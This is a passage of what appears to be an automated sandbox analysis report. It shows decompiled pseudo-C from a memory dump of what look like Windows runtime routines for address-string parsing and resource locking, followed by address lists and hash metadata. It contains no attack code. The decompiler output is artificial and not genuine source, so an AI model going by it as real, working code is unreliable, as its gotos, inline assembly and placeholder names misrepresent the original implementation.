                                                                                                                                                                                                          				_v28 = 0;
                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                          				_v24 = 0;
                                                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                                                          				_v32 = 0;
                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                          				if(_t141 == 0) {
                                                                                                                                                                                                          					L41:
                                                                                                                                                                                                          					 *_a8 = _t179;
                                                                                                                                                                                                          					_t180 = _v24;
                                                                                                                                                                                                          					if(_t180 != 0) {
                                                                                                                                                                                                          						if(_t180 != 3) {
                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_v8 = _v8 + 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t174 = _v32;
                                                                                                                                                                                                          					if(_t174 == 0) {
                                                                                                                                                                                                          						if(_v8 == 7) {
                                                                                                                                                                                                          							goto L43;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L6;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					L43:
                                                                                                                                                                                                          					if(_v16 != 1) {
                                                                                                                                                                                                          						if(_v16 != 2) {
                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                                                                          						L47:
                                                                                                                                                                                                          						if(_t174 != 0) {
                                                                                                                                                                                                          							E008E8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                                                                                                                                                                          							_t116 = 8;
                                                                                                                                                                                                          							E008DDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(_t180 != 0) {
                                                                                                                                                                                                          						if(_v12 > 3) {
                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t120 = E00910CFA(_v28, 0, 0xa);
                                                                                                                                                                                                          						_t183 = _t183 + 0xc;
                                                                                                                                                                                                          						if(_t120 > 0xff) {
                                                                                                                                                                                                          							goto L6;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                                                                                                                                                                          						goto L47;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(_v12 > 4) {
                                                                                                                                                                                                          						goto L6;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t121 = E00910CFA(_v28, _t180, 0x10);
                                                                                                                                                                                                          					_t183 = _t183 + 0xc;
                                                                                                                                                                                                          					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                                                                                                                                                                          					goto L47;
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                          						_t123 = _v16;
                                                                                                                                                                                                          						if(_t123 == 0) {
                                                                                                                                                                                                          							goto L7;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t108 = _t123 - 1;
                                                                                                                                                                                                          						if(_t108 != 0) {
                                                                                                                                                                                                          							goto L1;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t178 = _t141;
                                                                                                                                                                                                          						if(E009106BA(_t108, _t141) == 0 || _t135 == 0) {
                                                                                                                                                                                                          							if(E009106BA(_t135, _t178) == 0 || E00910A5B(_t136, _t178) == 0) {
                                                                                                                                                                                                          								if(_t141 != 0x3a) {
                                                                                                                                                                                                          									if(_t141 == 0x2e) {
                                                                                                                                                                                                          										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                                                                                                                                                                          											goto L41;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											_v24 = _v24 + 1;
                                                                                                                                                                                                          											L27:
                                                                                                                                                                                                          											_v16 = _v16 & 0x00000000;
                                                                                                                                                                                                          											L28:
                                                                                                                                                                                                          											if(_v28 == 0) {
                                                                                                                                                                                                          												goto L20;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											_t177 = _v24;
                                                                                                                                                                                                          											if(_t177 != 0) {
                                                                                                                                                                                                          												if(_v12 > 3) {
                                                                                                                                                                                                          													L6:
                                                                                                                                                                                                          													return 0xc000000d;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_t132 = E00910CFA(_v28, 0, 0xa);
                                                                                                                                                                                                          												_t183 = _t183 + 0xc;
                                                                                                                                                                                                          												if(_t132 > 0xff) {
                                                                                                                                                                                                          													goto L6;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                                                                                                                                                                          												goto L20;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											if(_v12 > 4) {
                                                                                                                                                                                                          												goto L6;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											_t133 = E00910CFA(_v28, 0, 0x10);
                                                                                                                                                                                                          											_t183 = _t183 + 0xc;
                                                                                                                                                                                                          											_v20 = _v20 + 1;
                                                                                                                                                                                                          											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                                                                                                                                                                          											goto L20;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									goto L41;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								if(_v24 > 0 || _v8 > 6) {
                                                                                                                                                                                                          									goto L41;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_t130 = _t179 + 1;
                                                                                                                                                                                                          									if( *_t130 == _t141) {
                                                                                                                                                                                                          										if(_v32 != 0) {
                                                                                                                                                                                                          											goto L41;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_v32 = _v8 + 1;
                                                                                                                                                                                                          										_t156 = 2;
                                                                                                                                                                                                          										_v8 = _v8 + _t156;
                                                                                                                                                                                                          										L34:
                                                                                                                                                                                                          										_t179 = _t130;
                                                                                                                                                                                                          										_v16 = _t156;
                                                                                                                                                                                                          										goto L28;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_v8 = _v8 + 1;
                                                                                                                                                                                                          									goto L27;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_v12 = _v12 + 1;
                                                                                                                                                                                                          								if(_v24 > 0) {
                                                                                                                                                                                                          									goto L41;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_a7 = 1;
                                                                                                                                                                                                          								goto L20;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_v12 = _v12 + 1;
                                                                                                                                                                                                          							L20:
                                                                                                                                                                                                          							_t179 = _t179 + 1;
                                                                                                                                                                                                          							_t141 =  *_t179;
                                                                                                                                                                                                          							if(_t141 == 0) {
                                                                                                                                                                                                          								goto L41;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							continue;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						L7:
                                                                                                                                                                                                          						if(_t141 == 0x3a) {
                                                                                                                                                                                                          							if(_v24 > 0 || _v8 > 0) {
                                                                                                                                                                                                          								goto L41;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t130 = _t179 + 1;
                                                                                                                                                                                                          								if( *_t130 != _t141) {
                                                                                                                                                                                                          									goto L41;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								_v20 = _v20 + 1;
                                                                                                                                                                                                          								_t156 = 2;
                                                                                                                                                                                                          								_v32 = 1;
                                                                                                                                                                                                          								_v8 = _t156;
                                                                                                                                                                                                          								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                                                                          								goto L34;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						L8:
                                                                                                                                                                                                          						if(_v8 > 7) {
                                                                                                                                                                                                          							goto L41;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t142 = _t141;
                                                                                                                                                                                                          						if(E009106BA(_t123, _t141) == 0 || _t124 == 0) {
                                                                                                                                                                                                          							if(E009106BA(_t124, _t142) == 0 || E00910A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                                                                                                                                                                          								goto L41;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t128 = 1;
                                                                                                                                                                                                          								_a7 = 1;
                                                                                                                                                                                                          								_v28 = _t179;
                                                                                                                                                                                                          								_v16 = 1;
                                                                                                                                                                                                          								_v12 = 1;
                                                                                                                                                                                                          								L39:
                                                                                                                                                                                                          								if(_v16 == _t128) {
                                                                                                                                                                                                          									goto L20;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								goto L28;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							_a7 = 0;
                                                                                                                                                                                                          							_v28 = _t179;
                                                                                                                                                                                                          							_v16 = 1;
                                                                                                                                                                                                          							_v12 = 1;
                                                                                                                                                                                                          							goto L20;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				L1:
                                                                                                                                                                                                          				_t123 = _t108 == 1;
                                                                                                                                                                                                          				if(_t108 == 1) {
                                                                                                                                                                                                          					goto L8;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t128 = 1;
                                                                                                                                                                                                          				goto L39;
                                                                                                                                                                                                          			}

























                                                                                                                                                                                                          0x0093eb01
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093eb01
                                                                                                                                                                                                          0x0093eacf
                                                                                                                                                                                                          0x00910ad0
                                                                                                                                                                                                          0x00910ad4
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00910ada
                                                                                                                                                                                                          0x00910ae6
                                                                                                                                                                                                          0x00910c34
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00910c47
                                                                                                                                                                                                          0x00910c49
                                                                                                                                                                                                          0x00910c4a
                                                                                                                                                                                                          0x00910c4e
                                                                                                                                                                                                          0x00910c51
                                                                                                                                                                                                          0x00910c54
                                                                                                                                                                                                          0x00910c57
                                                                                                                                                                                                          0x00910c5a
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00910c60
                                                                                                                                                                                                          0x00910afb
                                                                                                                                                                                                          0x00910afe
                                                                                                                                                                                                          0x00910b02
                                                                                                                                                                                                          0x00910b05
                                                                                                                                                                                                          0x00910b08
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00910b08
                                                                                                                                                                                                          0x00910ae6
                                                                                                                                                                                                          0x00910b44
                                                                                                                                                                                                          0x009109f8
                                                                                                                                                                                                          0x009109f8
                                                                                                                                                                                                          0x009109f9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0093eaa0
                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: __fassign
                                                                                                                                                                                                          • String ID: .$:$:
                                                                                                                                                                                                          • API String ID: 3965848254-2308638275
                                                                                                                                                                                                          • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                                                          • Instruction ID: 4c341bc0cd4cdd0165d215c8b7cc554e15125fba9fa2864f3f974a48ae18233f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CA19C71A0430EDFDF24CF64C8456FEB7B8AF95304F24856AD482A7281D6B69AC1CF91
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          C-Code - Quality: 50%
                                                                                                                                                                                                          			E00910554(signed int _a4, char _a8) {
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int* _t49;
                                                                                                                                                                                                          				signed int _t51;
                                                                                                                                                                                                          				signed int _t56;
                                                                                                                                                                                                          				signed int _t58;
                                                                                                                                                                                                          				signed int _t61;
                                                                                                                                                                                                          				signed int _t63;
                                                                                                                                                                                                          				void* _t66;
                                                                                                                                                                                                          				intOrPtr _t67;
                                                                                                                                                                                                          				void* _t69;
                                                                                                                                                                                                          				signed int _t70;
                                                                                                                                                                                                          				void* _t75;
                                                                                                                                                                                                          				signed int _t81;
                                                                                                                                                                                                          				signed int _t84;
                                                                                                                                                                                                          				void* _t86;
                                                                                                                                                                                                          				signed int _t93;
                                                                                                                                                                                                          				signed int _t96;
                                                                                                                                                                                                          				intOrPtr _t105;
                                                                                                                                                                                                          				signed int _t107;
                                                                                                                                                                                                          				void* _t110;
                                                                                                                                                                                                          				signed int _t115;
                                                                                                                                                                                                          				signed int* _t119;
                                                                                                                                                                                                          				void* _t125;
                                                                                                                                                                                                          				void* _t126;
                                                                                                                                                                                                          				signed int _t128;
                                                                                                                                                                                                          				signed int _t130;
                                                                                                                                                                                                          				signed int _t138;
                                                                                                                                                                                                          				signed int _t144;
                                                                                                                                                                                                          				void* _t158;
                                                                                                                                                                                                          				void* _t159;
                                                                                                                                                                                                          				void* _t160;
                                                                                                                                                                                                          
                                                                                                                                                                                                          				_t96 = _a4;
                                                                                                                                                                                                          				_t115 =  *(_t96 + 0x28);
                                                                                                                                                                                                          				_push(_t138);
                                                                                                                                                                                                          				if(_t115 < 0) {
                                                                                                                                                                                                          					_t105 =  *[fs:0x18];
                                                                                                                                                                                                          					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                                                                                                                                                                          					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                                                                                                                                                                          						goto L6;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						__eflags = _t115 | 0xffffffff;
                                                                                                                                                                                                          						asm("lock xadd [eax], edx");
                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					L6:
                                                                                                                                                                                                          					_push(_t128);
                                                                                                                                                                                                          					while(1) {
                                                                                                                                                                                                          						L7:
                                                                                                                                                                                                          						__eflags = _t115;
                                                                                                                                                                                                          						if(_t115 >= 0) {
                                                                                                                                                                                                          							break;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						__eflags = _a8;
                                                                                                                                                                                                          						if(_a8 == 0) {
                                                                                                                                                                                                          							__eflags = 0;
                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                                                                          							_t49 = _t96 + 0x1c;
                                                                                                                                                                                                          							_t106 = 1;
                                                                                                                                                                                                          							asm("lock xadd [edx], ecx");
                                                                                                                                                                                                          							_t115 =  *(_t96 + 0x28);
                                                                                                                                                                                                          							__eflags = _t115;
                                                                                                                                                                                                          							if(_t115 < 0) {
                                                                                                                                                                                                          								L23:
                                                                                                                                                                                                          								_t130 = 0;
                                                                                                                                                                                                          								__eflags = 0;
                                                                                                                                                                                                          								while(1) {
                                                                                                                                                                                                          									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                                                                          									asm("sbb esi, esi");
                                                                                                                                                                                                          									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009b01c0;
                                                                                                                                                                                                          									_push(_t144);
                                                                                                                                                                                                          									_push(0);
                                                                                                                                                                                                          									_t51 = E008CF8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                                                                                                                                                                          									__eflags = _t51 - 0x102;
                                                                                                                                                                                                          									if(_t51 != 0x102) {
                                                                                                                                                                                                          										break;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_t106 =  *(_t144 + 4);
                                                                                                                                                                                                          									_t126 =  *_t144;
                                                                                                                                                                                                          									_t86 = E00914FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                                                                                                                                                                          									_push(_t126);
                                                                                                                                                                                                          									_push(_t86);
                                                                                                                                                                                                          									E00923F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                                                                                                                                                                          									E00923F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                                                                          									_t130 = _t130 + 1;
                                                                                                                                                                                                          									_t160 = _t158 + 0x28;
                                                                                                                                                                                                          									__eflags = _t130 - 2;
                                                                                                                                                                                                          									if(__eflags > 0) {
                                                                                                                                                                                                          										E0095217A(_t106, __eflags, _t96);
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									_push("RTL: Re-Waiting\n");
                                                                                                                                                                                                          									_push(0);
                                                                                                                                                                                                          									_push(0x65);
                                                                                                                                                                                                          									E00923F92();
                                                                                                                                                                                                          									_t158 = _t160 + 0xc;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								__eflags = _t51;
                                                                                                                                                                                                          								if(__eflags < 0) {
                                                                                                                                                                                                          									_push(_t51);
                                                                                                                                                                                                          									E00913915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                                                                                                                                                                          									asm("int3");
                                                                                                                                                                                                          									while(1) {
                                                                                                                                                                                                          										L32:
                                                                                                                                                                                                          										__eflags = _a8;
                                                                                                                                                                                                          										if(_a8 == 0) {
                                                                                                                                                                                                          											break;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                                                                          										_t119 = _t96 + 0x24;
                                                                                                                                                                                                          										_t107 = 1;
                                                                                                                                                                                                          										asm("lock xadd [eax], ecx");
                                                                                                                                                                                                          										_t56 =  *(_t96 + 0x28);
                                                                                                                                                                                                          										_a4 = _t56;
                                                                                                                                                                                                          										__eflags = _t56;
                                                                                                                                                                                                          										if(_t56 != 0) {
                                                                                                                                                                                                          											L40:
                                                                                                                                                                                                          											_t128 = 0;
                                                                                                                                                                                                          											__eflags = 0;
                                                                                                                                                                                                          											while(1) {
                                                                                                                                                                                                          												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                                                                          												asm("sbb esi, esi");
                                                                                                                                                                                                          												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009b01c0;
                                                                                                                                                                                                          												_push(_t138);
                                                                                                                                                                                                          												_push(0);
                                                                                                                                                                                                          												_t58 = E008CF8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                                                                                                                                                                          												__eflags = _t58 - 0x102;
                                                                                                                                                                                                          												if(_t58 != 0x102) {
                                                                                                                                                                                                          													break;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_t107 =  *(_t138 + 4);
                                                                                                                                                                                                          												_t125 =  *_t138;
                                                                                                                                                                                                          												_t75 = E00914FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                                                                                                                                                                          												_push(_t125);
                                                                                                                                                                                                          												_push(_t75);
                                                                                                                                                                                                          												E00923F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                                                                                                                                                                          												E00923F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                                                                          												_t128 = _t128 + 1;
                                                                                                                                                                                                          												_t159 = _t158 + 0x28;
                                                                                                                                                                                                          												__eflags = _t128 - 2;
                                                                                                                                                                                                          												if(__eflags > 0) {
                                                                                                                                                                                                          													E0095217A(_t107, __eflags, _t96);
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_push("RTL: Re-Waiting\n");
                                                                                                                                                                                                          												_push(0);
                                                                                                                                                                                                          												_push(0x65);
                                                                                                                                                                                                          												E00923F92();
                                                                                                                                                                                                          												_t158 = _t159 + 0xc;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											__eflags = _t58;
                                                                                                                                                                                                          											if(__eflags < 0) {
                                                                                                                                                                                                          												_push(_t58);
                                                                                                                                                                                                          												E00913915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                                                                                                                                                                          												asm("int3");
                                                                                                                                                                                                          												_t61 =  *_t107;
                                                                                                                                                                                                          												 *_t107 = 0;
                                                                                                                                                                                                          												__eflags = _t61;
                                                                                                                                                                                                          												if(_t61 == 0) {
                                                                                                                                                                                                          													L1:
                                                                                                                                                                                                          													_t63 = E008F5384(_t138 + 0x24);
                                                                                                                                                                                                          													if(_t63 != 0) {
                                                                                                                                                                                                          														goto L52;
                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                          														goto L2;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                                                                                                                                                                          													_push( &_a4);
                                                                                                                                                                                                          													_push(_t61);
                                                                                                                                                                                                          													_t70 = E008CF970( *((intOrPtr*)(_t138 + 0x18)));
                                                                                                                                                                                                          													__eflags = _t70;
                                                                                                                                                                                                          													if(__eflags >= 0) {
                                                                                                                                                                                                          														goto L1;
                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                          														_push(_t70);
                                                                                                                                                                                                          														E00913915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                                                                                                                                                                          														L52:
                                                                                                                                                                                                          														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                                                                          														_push( &_a4);
                                                                                                                                                                                                          														_push(1);
                                                                                                                                                                                                          														_t63 = E008CF970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                                                                          														__eflags = _t63;
                                                                                                                                                                                                          														if(__eflags >= 0) {
                                                                                                                                                                                                          															L2:
                                                                                                                                                                                                          															return _t63;
                                                                                                                                                                                                          														} else {
                                                                                                                                                                                                          															_push(_t63);
                                                                                                                                                                                                          															E00913915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                                                                                                                                                                          															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                                                                                                                                                                          															_push( &_a4);
                                                                                                                                                                                                          															_push(1);
                                                                                                                                                                                                          															_t63 = E008CF970( *((intOrPtr*)(_t138 + 0x20)));
                                                                                                                                                                                                          															__eflags = _t63;
                                                                                                                                                                                                          															if(__eflags >= 0) {
                                                                                                                                                                                                          																goto L2;
                                                                                                                                                                                                          															} else {
                                                                                                                                                                                                          																_push(_t63);
                                                                                                                                                                                                          																_t66 = E00913915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                                                                                                                                                                          																asm("int3");
                                                                                                                                                                                                          																while(1) {
                                                                                                                                                                                                          																	_t110 = _t66;
                                                                                                                                                                                                          																	__eflags = _t66 - 1;
                                                                                                                                                                                                          																	if(_t66 != 1) {
                                                                                                                                                                                                          																		break;
                                                                                                                                                                                                          																	}
                                                                                                                                                                                                          																	_t128 = _t128 | 0xffffffff;
                                                                                                                                                                                                          																	_t66 = _t110;
                                                                                                                                                                                                          																	asm("lock cmpxchg [ebx], edi");
                                                                                                                                                                                                          																	__eflags = _t66 - _t110;
                                                                                                                                                                                                          																	if(_t66 != _t110) {
                                                                                                                                                                                                          																		continue;
                                                                                                                                                                                                          																	} else {
                                                                                                                                                                                                          																		_t67 =  *[fs:0x18];
                                                                                                                                                                                                          																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                                                                                                                                                                          																		return _t67;
                                                                                                                                                                                                          																	}
                                                                                                                                                                                                          																	goto L59;
                                                                                                                                                                                                          																}
                                                                                                                                                                                                          																E008F5329(_t110, _t138);
                                                                                                                                                                                                          																_t69 = E008F53A5(_t138, 1);
                                                                                                                                                                                                          																return _t69;
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												_t56 =  *(_t96 + 0x28);
                                                                                                                                                                                                          												goto L3;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											_t107 =  *_t119;
                                                                                                                                                                                                          											__eflags = _t107;
                                                                                                                                                                                                          											if(__eflags > 0) {
                                                                                                                                                                                                          												while(1) {
                                                                                                                                                                                                          													_t81 = _t107;
                                                                                                                                                                                                          													asm("lock cmpxchg [edi], esi");
                                                                                                                                                                                                          													__eflags = _t81 - _t107;
                                                                                                                                                                                                          													if(_t81 == _t107) {
                                                                                                                                                                                                          														break;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													_t107 = _t81;
                                                                                                                                                                                                          													__eflags = _t81;
                                                                                                                                                                                                          													if(_t81 > 0) {
                                                                                                                                                                                                          														continue;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													break;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												_t56 = _a4;
                                                                                                                                                                                                          												__eflags = _t107;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          											if(__eflags != 0) {
                                                                                                                                                                                                          												while(1) {
                                                                                                                                                                                                          													L3:
                                                                                                                                                                                                          													__eflags = _t56;
                                                                                                                                                                                                          													if(_t56 != 0) {
                                                                                                                                                                                                          														goto L32;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													_t107 = _t107 | 0xffffffff;
                                                                                                                                                                                                          													_t56 = 0;
                                                                                                                                                                                                          													asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                          													__eflags = 0;
                                                                                                                                                                                                          													if(0 != 0) {
                                                                                                                                                                                                          														continue;
                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                          														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                                                                          														return 1;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          													goto L59;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												continue;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												goto L40;
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										goto L59;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									__eflags = 0;
                                                                                                                                                                                                          									return 0;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									_t115 =  *(_t96 + 0x28);
                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t106 =  *_t49;
                                                                                                                                                                                                          								__eflags = _t106;
                                                                                                                                                                                                          								if(__eflags > 0) {
                                                                                                                                                                                                          									while(1) {
                                                                                                                                                                                                          										_t93 = _t106;
                                                                                                                                                                                                          										asm("lock cmpxchg [edi], esi");
                                                                                                                                                                                                          										__eflags = _t93 - _t106;
                                                                                                                                                                                                          										if(_t93 == _t106) {
                                                                                                                                                                                                          											break;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										_t106 = _t93;
                                                                                                                                                                                                          										__eflags = _t93;
                                                                                                                                                                                                          										if(_t93 > 0) {
                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										break;
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          									__eflags = _t106;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                          									continue;
                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                          									goto L23;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						goto L59;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t84 = _t115;
                                                                                                                                                                                                          					asm("lock cmpxchg [esi], ecx");
                                                                                                                                                                                                          					__eflags = _t84 - _t115;
                                                                                                                                                                                                          					if(_t84 != _t115) {
                                                                                                                                                                                                          						_t115 = _t84;
                                                                                                                                                                                                          						goto L7;
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						return 1;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				L59:
                                                                                                                                                                                                          			}

                                                                                                                                                                                                          0x009321a0
                                                                                                                                                                                                          0x009321a2
                                                                                                                                                                                                          0x009321ce
                                                                                                                                                                                                          0x009321ce
                                                                                                                                                                                                          0x009321ce
                                                                                                                                                                                                          0x009321d0
                                                                                                                                                                                                          0x009321d6
                                                                                                                                                                                                          0x009321de
                                                                                                                                                                                                          0x009321e2
                                                                                                                                                                                                          0x009321e8
